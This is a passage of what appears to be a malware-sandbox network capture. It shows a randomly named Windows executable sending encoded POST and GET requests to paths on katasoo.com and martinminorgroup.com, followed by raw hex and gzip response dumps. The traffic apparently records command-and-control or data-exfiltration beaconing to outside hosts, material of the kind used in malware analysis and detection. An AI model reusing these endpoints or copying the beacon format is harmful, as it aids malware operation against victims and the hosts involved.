                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 61 6b 51 6a 68 33 64 41 52 6c 6e 77 67 74 31 58 47 67 58 78 6d 4f 57 49 6c 64 4b 62 36 43 35 4f 52 67 68 41 61 50 2f 30 59 54 33 54 66 6b 59 33 76 6d 6a 72 42 67 7a 58 45 2b 52 54 32 79 65 53 75 53 43 32 45 43 55 39 75 79 36 4f 5a 6b 75 70 48 63 49 39 56 71 6a 30 35 74 55 66 4c 4d 69 73 62 7a 66 69 43 6c 78 4b 2f 47 61 4b 6f 2b 77 62 44 4b 4e 57 59 6b 32 64 50 47 5a 4d 43 55 6c 47 36 73 37 4d 56 78 4f 31 36 55 54 4e 57 43 32 55 50 6e 67 31 5a 35 65 6b 79 68 6d 79 45 57 6d 44 76 5a 31 4d 31 57 32 71 79 69 79 71 46 6c 73 34 6a 43 6b 45 6e 7a 50 37 4f 4c 46 6d 2f 74 33 42 4f 36 50 4e 48 6f 4a 55 66 6f 67 3d
                                                            Data Ascii: 4NZpb=QamxpcChhbknakQjh3dARlnwgt1XGgXxmOWIldKb6C5ORghAaP/0YT3TfkY3vmjrBgzXE+RT2yeSuSC2ECU9uy6OZkupHcI9Vqj05tUfLMisbzfiClxK/GaKo+wbDKNWYk2dPGZMCUlG6s7MVxO16UTNWC2UPng1Z5ekyhmyEWmDvZ1M1W2qyiyqFls4jCkEnzP7OLFm/t3BO6PNHoJUfog=
                                                            Aug 28, 2024 14:04:13.389419079 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4299e0a1f429d-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85
                                                            Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt|yB?z9?
                                                            Aug 28, 2024 14:04:13.389434099 CEST | 1236 | IN | Data Raw: 9c d3 66 f4 0d a8 35 ad 8c 7e 41 b0 7b ba bf 77 b2 24 09 46 ce 02 c7 94 24 63 e5 d7 4f 3f 68 47 0a 32 20 c7 f7 82 4b 14 13 7f ac 44 71 38 f3 7c a2 a0 45 4c 66 63 65 91 24 d1 d0 30 e6 cb 68 ae 87 f1 dc b8 9e 05 86 65 ad 97 f2 82 f9 14 3b 97 95 62
                                                            Data Ascii: f5~A{w$F$cO?hG2 KDq8|ELfce$0he;b84u'\K?=ZDub/JN4p/-YQ9AIc/S/SCm]VvC'] /|!?I'?9,A0\t'%aLNY%p&0HH[K|yK<'Z+>
                                                            Aug 28, 2024 14:04:13.389441013 CEST | 1236 | IN | Data Raw: 5c d6 52 45 a5 e3 cf 7c 46 aa 62 54 9c ab 81 2e 44 31 1d df b2 39 9f 2c bc 60 3e 7c 66 aa c5 af 77 d7 0e 89 92 1f 7c 0c e9 77 2a 61 d2 4f d4 58 62 81 a7 63 d7 7d 77 45 82 e4 bd 47 13 58 21 da ca f7 1f 3f bc e5 2a d4 fb 10 bb c4 55 54 a2 de 86 81
                                                            Data Ascii: \RE|FbT.D19,`>|fw|w*aOXbc}wEGX!?*UTCX7q,yJ|10VNgJ8 N3>%HSKiz?';2uu"JS&Sk3b[qU&J=?8b}d:S[B| 9i+fz%yW
                                                            Aug 28, 2024 14:04:13.389906883 CEST | 672 | IN | Data Raw: e1 b5 89 0d 76 df 56 ad a3 be 6a 16 6c 80 c4 be 6a 99 22 f1 5e a4 f0 2a 0b 6e b0 29 b1 b9 7e a9 2a c1 07 db 3c 54 7b 03 b5 37 d8 56 39 28 6a 79 57 e0 1b a8 76 5d 08 6c e8 04 bb 7b a4 8a 7f c5 18 18 1c ab d6 51 4f b5 8e fb db aa 77 c2 d0 87 3a 57
                                                            Data Ascii: vVjlj"^*n)~*<T{7V9(jyWv]l{QOw:W8^jLrc=1g]AA1W:(OvH=)6H`fQ[mlzmUk/EjArP5uSzCeEA(XvQlV5
                                                            Aug 28, 2024 14:04:13.389913082 CEST | 1236 | IN | Data Raw: ab 16 ab c1 cc 36 41 3b a2 63 b0 35 38 f2 4d d2 8e 78 72 f8 1a 5c b9 d6 b8 23 ae 1c be 06 57 bd 6a ba 1b de da b2 db eb e0 9a f8 83 aa 60 45 eb 6a a8 ee 34 76 c4 5e 29 d6 c8 eb 7b 63 ae 16 6b 1a 11 c5 be ec 1e c3 22 2f d4 48 ef 7d d1 56 4a 35 e2
                                                            Data Ascii: 6A;c58Mxr\#Wj`Ej4v^){ck"/H}VJ5"5n`O S1l,yL0Qr+Y=w}$}{|Ud'y@{d(2<N=eCzzpWKf=tKV=)W(6B
                                                            Aug 28, 2024 14:04:13.389919043 CEST | 1236 | IN | Data Raw: 64 06 29 1c 27 da 05 d5 c8 75 12 e3 9a 30 0a 70 e5 6a e5 4c b0 eb 4e 92 70 02 d0 93 08 c7 78 c9 03 29 e0 0b 7c 3d 49 59 e4 03 16 74 00 bb 4b 2f f8 62 b0 0f 0d 32 59 a4 11 55 01 0c 32 e8 6b 20 e0 02 5f 8f 5f bc 20 81 1b 85 5e 90 bc 78 a1 a8 8a 67
                                                            Data Ascii: d)'u0pjLNpx)|=IYtK/b2YU2k __ ^xgX'YMP*f X8fr1q8C{]o;,2A X+k`H<~3G<-WYo"8imnx4JFq<xAt1$7
                                                            Aug 28, 2024 14:04:13.389930964 CEST | 1236 | IN | Data Raw: cb 68 c1 3b d8 10 79 cb f9 19 f3 d8 08 63 34 46 0a 1b 90 90 a8 22 1d e4 bf f8 ba f2 dc 39 49 32 45 3f cb 17 eb 84 00 11 fb 25 f1 33 c1 d7 99 b8 9b 38 38 03 82 a5 08 be 2a a3 9c 80 8c 2e a8 6c 2c 4d 40 7a 46 fc 75 9d 81 27 57 47 44 55 32 18 46 18
                                                            Data Ascii: h;yc4F"9I2E?%388*.l,M@zFu'WGDU2F{s/>e]v{13slo7Z+gzCY A`hk1FcG,}s?DUlC:U>}z5IF|H*ptfz+<y.oW!SR}>\
                                                            Aug 28, 2024 14:04:13.389938116 CEST | 1236 | IN | Data Raw: bf 05 c9 57 86 c4 ea 9b ad 4c 13 ab c3 63 9a d5 b5 5c c6 91 70 1c 66 86 a3 52 1a 42 d4 6d 28 bd 64 a5 ed 1e 94 2e 71 ef e5 18 99 fa b1 c4 3c 09 67 d7 de 88 33 60 38 bb 76 03 45 fd 8d ed 61 65 fb 4d ad 19 6c 6e cd 1f ac f4 a0 d7 50 fa 68 33 27 1d
                                                            Data Ascii: WLc\pfRBm(d.q<g3`8vEaeMlnPh3'V({b*xmZUGbIM^f,\PdU+JY1S&,sN<Kc8d&7>s4x&F[kT{1y}:lAyY?*E4
                                                            Aug 28, 2024 14:04:13.390197992 CEST | 1236 | IN | Data Raw: 8e 53 84 d5 72 5e 9e 05 dc 05 61 06 7e f6 8c 3c b8 00 1c cc 55 be 47 63 6d 1f b7 04 15 ad 73 95 45 7f 16 58 32 e2 6e ab 52 33 67 4c c1 2d f4 d2 e0 18 99 fb 31 47 ab 88 f2 ca 79 05 43 85 c9 7f c9 fb 22 e7 b7 84 6b 3a 97 11 d5 0c 60 89 2a 09 d3 4b
                                                            Data Ascii: Sr^a~<UGcmsEX2nR3gL-1GyC"k:`*KCsAMS'.w\ SkYLd2#Fl?*F1!F82W&eb_y19N^@t}XaRS<)rT"H|>u!Qbdc1s".g7R
                                                            Aug 28, 2024 14:04:13.390202999 CEST | 1236 | IN | Data Raw: d4 62 ff 8d d0 9d 17 d0 9d 0a 90 69 f7 b8 7b 3c 42 b5 aa 8d 17 e4 aa 0d 98 c9 3b b7 45 18 0e c6 84 7c 49 2d 58 72 2b 15 b2 7b 87 f2 59 c0 a8 21 f9 ee 4e 9f 85 61 42 62 cd ae 3d 04 38 9a 61 38 04 c0 53 1a fa 69 02 51 a6 43 36 36 c0 47 60 53 81 62
                                                            Data Ascii: bi{<B;E|I-Xr+{Y!NaBb=8a8SiQC66G`Sb.#qD1ro)x6ZBtX('+eA/d3aR@H~}RGa6)0$=~M\ZjGEQsJco-wkC?"HKS
                                                            Aug 28, 2024 14:04:13.397073030 CEST | 1236 | IN | Data Raw: 4a 73 8a 7f f5 3d 51 21 9f 79 fb 52 ca fd a6 a4 50 05 ef 3f 33 6b 75 c1 2d 33 b3 46 19 e4 33 f1 7e 73 af d8 de ec 32 e9 9a e6 99 74 44 91 84 73 08 74 c8 ce a1 c3 a8 32 0d 4b aa 26 9f 57 61 94 46 99 fe c8 b1 cb e7 1d 6c 76 97 a6 7a a1 95 16 0c 7a
                                                            Data Ascii: Js=Q!yRP?3ku-3F3~s2tDst2K&WaFlvzzI/Bg!od.Ei ~ 5a5Rn|Ze^x2ub,zM00)MMDmXv<4/.f}eLG)$Yvum465*Z$


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.4 | 49760 | 188.114.96.3 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:15.251789093 CEST | 10872 | OUT | POST /7qad/ HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.katasoo.com
                                                            Referer: http://www.katasoo.com/7qad/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 51 61 6d 78 70 63 43 68 68 62 6b 6e 61 6b 51 6a 68 33 64 41 52 6c 6e 77 67 74 31 58 47 67 58 78 6d 4f 57 49 6c 64 4b 62 36 43 78 4f 52 53 70 41 63 6f 6a 30 4a 6a 33 54 45 6b 5a 77 76 6d 6a 4d 42 67 71 65 45 2b 4e 44 32 33 61 53 75 30 57 32 43 7a 55 39 6b 79 36 4f 47 30 75 6f 61 4d 49 73 56 72 54 34 35 73 6f 66 4c 4d 69 73 62 77 58 69 46 30 78 4b 39 47 61 4e 72 2b 77 58 48 4b 4e 2b 59 6e 47 6e 50 47 63 37 43 6e 74 47 36 50 54 4d 55 43 71 31 32 55 54 4c 59 69 32 4d 50 6e 38 71 5a 35 7a 62 79 68 36 49 45 57 43 44 73 2f 55 32 74 46 71 69 77 53 71 35 52 79 55 35 69 41 73 54 70 77 61 41 65 70 74 65 76 73 54 77 47 61 47 57 64 62 55 4f 4c 74 64 33 66 62 37 66 41 64 33 79 47 71 70 74 6d 66 39 43 6e 4d 71 42 4d 62 6a 53 2f 4b 56 75 6c 6a 67 55 4d 77 4a 4a 4b 31 72 4b 37 50 54 37 67 4b 6a 6a 7a 34 44 6c 69 55 55 63 6b 59 4e 33 6e 48 2f 4b 75 6a 4a 73 69 48 59 67 6c 68 2f 77 73 65 73 38 62 41 6f 4e 31 35 37 2b 53 68 38 41 4d 50 32 45 49 2b 6f 64 58 6a 46 4a 48 46 4d 55 62 55 38 37 59 46 62 55 [TRUNCATED]
                                                            Data Ascii: 4NZpb= [TRUNCATED]
                                                            Aug 28, 2024 14:04:15.934319019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:04:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnly
                                                            link: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"
                                                            vary: Accept-Encoding
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba429addc408cdd-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad
                                                            Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g|Y2igo~zN9:d`:THz "?L5%vEst3\ori%|'_sFdg.!|35
                                                            Aug 28, 2024 14:04:15.934345007 CEST | 1236 | IN | Data Raw: 8c 7e 46 b0 7b 7e 78 70 36 27 09 46 ce 0c c7 94 24 43 e5 d7 4f 3f 68 27 0a 32 20 c7 f7 82 6b 14 13 7f a8 44 71 38 f1 7c a2 a0 59 4c 26 43 65 96 24 51 df 30 a6 f3 68 aa 87 f1 d4 b8 9d 04 86 65 ad 97 f2 82 e9 18 3b d7 95 62 d7 38 c1 34 0c 75 27 9c
                                                            Data Ascii: ~F{~xp6'F$CO?h'2 kDq8|YL&Ce$Q0he;b84u's?=Eub/J4p/s$C1k6hj5I$H;Gkpf/x<K$L=?-kIFI3rxN8m '$jO#)i@3
                                                            Aug 28, 2024 14:04:15.934350014 CEST | 1236 | IN | Data Raw: 51 71 a9 06 ba 10 c5 74 b8 64 73 3e 99 79 c1 b4 ff cc 54 8b 5f ef 6e 1d 12 25 3f f8 18 d2 57 2a 61 d2 4f d4 58 62 81 a7 63 d7 7d 77 43 82 e4 bd 47 13 58 21 9a ca f7 1f 3f bc e5 2a d4 fb 10 bb c4 55 54 a2 2e c3 c0 21 ac 1b 56 5c 78 ad 21 4b 38 bf
                                                            Data Ascii: Qqtds>yT_n%?W*aOXbc}wCGX!?*UT.!V\x!K8aR,d~q2Lx(OHR/?GGugvNLh./j|WMF7DGG^vX?v+QHR<%MDO6[se-5`H
                                                            Aug 28, 2024 14:04:15.934464931 CEST | 1236 | IN | Data Raw: 06 48 ec aa 96 29 12 ef 45 0a af b2 e0 06 9b 12 db eb 97 aa 12 7c b0 cd 63 b5 d3 53 3b bd 5d 95 83 a2 96 77 05 be 83 6a d7 85 c0 96 4e b0 db 27 aa f8 57 8c 81 de a9 6a 9d 74 54 eb b4 bb ab 7a 27 0c 7d a8 73 81 e3 b9 c6 c4 59 9c ce b7 56 78 dc 51
                                                            Data Ascii: H)E|cS;]wjN'WjtTz'}sYVxQv:^sj-dP'Kk,]NjwN)2lDf|fWzbPt;jv-*7US{Q7{4Z]4uj5]U3Y:d4`vXE'6
                                                            Aug 28, 2024 14:04:15.934470892 CEST | 1236 | IN | Data Raw: 0a 8c b1 ac 8a 87 50 2f b9 a2 86 21 bb 84 17 3b 24 f3 88 db ea 18 a7 4b 05 10 0c 7d a4 b3 09 10 87 0b a4 c3 05 0d 2f 26 2e 5a a2 1b 8f 7a 63 cf f7 92 bb 3e ff ee 93 01 da d3 4b 33 0c b5 1b 1c 7b cc 9d 4f a3 0b f0 d6 26 f4 61 9c 5c c7 b3 93 85 d6
                                                            Data Ascii: P/!;$K}/&.Zzc>K3{O&a\{;'dZ94uB7-i29Q_)x}&$68g6?lZt;mX6`lu4o(7^hp2:a\+&qxMv;eIMw
                                                            Aug 28, 2024 14:04:15.934483051 CEST | 1236 | IN | Data Raw: 08 e9 7f 68 5e e0 92 5b a0 a6 d3 85 e6 e5 bb ea 4c 2a 9c 5f fd 03 b4 c7 3c 1a 5b 8b 5f 8f cf ef d3 a3 e6 77 2d c1 01 c3 40 3e fe e3 8e 05 c9 63 09 10 06 af d1 c8 b2 e1 3f 8e 4c 27 b7 20 0f 9a e2 17 14 82 d8 1f ff f9 49 95 40 e1 3f 1a 3b 6f 92 24
                                                            Data Ascii: h^[L*_<[_w-@>c?L' I@?;o$4vj@>>8cr~eEufpbfD8}37`tRf9Usnuy>Pua_$dhjY*2=0p-HLu)9P
                                                            Aug 28, 2024 14:04:15.934489965 CEST | 1236 | IN | Data Raw: b0 76 a3 ce 34 5d c3 40 cc 59 67 5c ec a9 0f f7 37 a3 e4 fc c9 1d 7e a8 90 e0 8d ed 83 e1 29 b6 dd 33 cf 75 49 20 cf a6 bd 76 64 f5 76 80 6f 64 0b 10 bb bb 6e b1 bb cb b6 17 4c 3b b7 24 f5 3c 53 df f7 60 2c b3 05 6d 68 22 0c 24 6f 9c 26 a4 2a f7
                                                            Data Ascii: v4]@Yg\7~)3uI vdvodnL;$<S`,mh"$o&*#L[F&"[,~}4DAi0-njQEBgiA.kR<'RzjARQw_*OR0@nj9j=22L|}Le%AjakNa)InA
                                                            Aug 28, 2024 14:04:15.934721947 CEST | 1236 | IN | Data Raw: 82 30 af 79 cd 8d ab 3a 43 97 a8 18 9f 25 07 ac 62 ac 1a 39 be c3 83 b2 3f 19 5b 7c d9 53 94 10 7e c0 9b 08 57 37 69 e6 7e fd 8f 9f 7e bb f9 3a fb f8 eb df 7e 9f 4e fe ba f8 f4 3f d3 29 be 31 ff 66 5b 38 fa c7 df 8e bd 8f ee e4 d7 df 7e 3b 4d c3
                                                            Data Ascii: 0y:C%b9?[|S~W7i~~:~N?)1f[8~;M{.}~c<s?P}b%`.S6a`4io6{-R9[uZ^=A}#bN[T<T>y>?:[X#/
                                                            Aug 28, 2024 14:04:15.934727907 CEST | 1236 | IN | Data Raw: 68 55 b2 9d e4 8b a0 d8 5a f2 a1 fe 08 ec c6 4b f4 83 e7 fb 4c e3 60 0c de af 3b f6 06 e6 5d b0 84 70 2f 1b b5 9d b2 de 54 2c b1 97 b9 1a 43 89 13 06 6e 55 03 cd a6 50 29 b7 3c ee 4b 0b 76 a6 2e 64 e0 35 9a 41 b1 2c d5 48 3e 79 2e ea b0 2d c2 4c
                                                            Data Ascii: hUZKL`;]p/T,CnUP)<Kv.d5A,H>y.-Ler5R\9cprt>hB%yr2v,<@F^J[zVx':~dD,XLvT6|ee^)X.sQT)R$}.Jy0"(*8n
                                                            Aug 28, 2024 14:04:15.934740067 CEST | 1236 | IN | Data Raw: 00 10 33 7c 66 e7 41 0c f8 e0 20 1f 69 cf 45 ac af 30 22 81 10 03 1a 08 55 91 1c 85 74 a8 30 b2 f8 6f 30 e2 e4 30 99 9e 24 f2 84 05 23 e7 b3 27 de 8b 50 10 48 4c 2e f6 86 ca 07 86 9c a5 88 8b 2f 54 42 29 72 c8 6d 84 03 97 b8 43 85 39 e7 32 99 70
                                                            Data Ascii: 3|fA iE0"Ut0o00$#'PHL./TB)rmC92pxp9/r~fx,{%GogKj%,;WJ+rfRDA[^aN8KKZ02Jo1XfG WU\Bd~-QQf{|)+Am
                                                            Aug 28, 2024 14:04:15.939670086 CEST | 1236 | IN | Data Raw: 63 4a 9c 82 b4 2b bb 5b c1 2b 70 63 51 10 3b 3d 1b 2a 92 e7 57 8f cc 07 a8 e4 e3 02 ce fa 83 e2 4a ac de 56 ce 3b 66 27 df b9 0a 93 d0 66 02 4e 0b 7b 9c 38 3f 12 30 c5 61 67 0e 71 70 36 b3 ea b2 3f 86 11 7d 86 3e cd 30 0f b1 8e 1c 1c 1c c5 f4 6b
                                                            Data Ascii: cJ+[+pcQ;=*WJV;f'fN{8?0agqp6?}>0k4c1^^726 ?)k?S^{(4>1AI|t8a,W?\ /2Mfun(Bmj1<t;(vohIeJ,%dxAlt


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.4 | 49761 | 188.114.96.3 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:17.784651995 CEST | 511 | OUT | GET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1
                                                            Host: www.katasoo.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:18.440270901 CEST | 1140 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 28 Aug 2024 12:04:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_a9ea725040cb8e19eaddd4f16c2c34%7C%7C1725019458%7C%7C1725015858%7C%7Ce048d9e0e9eadcc83535b16220447699; expires=Fri, 30-Aug-2024 12:04:18 GMT; Max-Age=172800; path=/; HttpOnly
                                                            x-redirect-by: WordPress
                                                            location: http://katasoo.com/7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE=
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA3oeg6STlrtWGrj%2BvwXtR%2FOwyJhnxb8vZI8ceIeubVr0ssxvBJ%2BONcM2Y0YGJb8R0Q6Y39aD4159VhzRKprdnQyWokmNaXIOMcI8QSUWsrsglVahKK3I3Czlr8YCDWN85c%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba429bdaaf317f5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.4 | 49762 | 34.149.87.45 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:23.507682085 CEST | 797 | OUT | POST /oyqt/ HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4a 71 34 64 6d 4f 76 73 38 37 35 5a 69 78 7a 55 34 46 75 59 72 50 35 58 78 4f 47 75 45 50 54 36 32 36 57 42 68 70 53 33 58 4f 6a 78 2b 38 67 51 77 61 38 45 33 61 2b 79 6a 2b 45 30 2f 61 77 44 65 76 58 30 49 34 4b 56 70 6e 71 66 51 67 38 32 4f 70 67 33 53 70 6a 43 7a 4c 43 35 6e 4a 2f 6d 64 6c 32 53 4f 63 49 62 57 69 72 6a 45 35 2f 6d 61 6b 34 54 45 50 70 36 4d 31 74 72 44 39 5a 4c 38 57 6c 51 68 66 43 42 6c 61 42 59 57 58 44 51 6a 53 34 37 6d 76 6c 49 5a 4e 58 73 6d 70 36 36 6c 33 41 6b 55 31 32 36 67 46 58 6a 76 6e 54 35 4d 76 62 70 4c 51 3d 3d
                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3Jq4dmOvs875ZixzU4FuYrP5XxOGuEPT626WBhpS3XOjx+8gQwa8E3a+yj+E0/awDevX0I4KVpnqfQg82Opg3SpjCzLC5nJ/mdl2SOcIbWirjE5/mak4TEPp6M1trD9ZL8WlQhfCBlaBYWXDQjS47mvlIZNXsmp66l3AkU126gFXjvnT5MvbpLQ==
                                                            Aug 28, 2024 14:04:23.975227118 CEST | 396 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:23 GMT
                                                            X-Served-By: cache-iad-kcgs7200079-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.4 | 49763 | 34.149.87.45 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:26.049773932 CEST | 817 | OUT | POST /oyqt/ HTTP/1.1
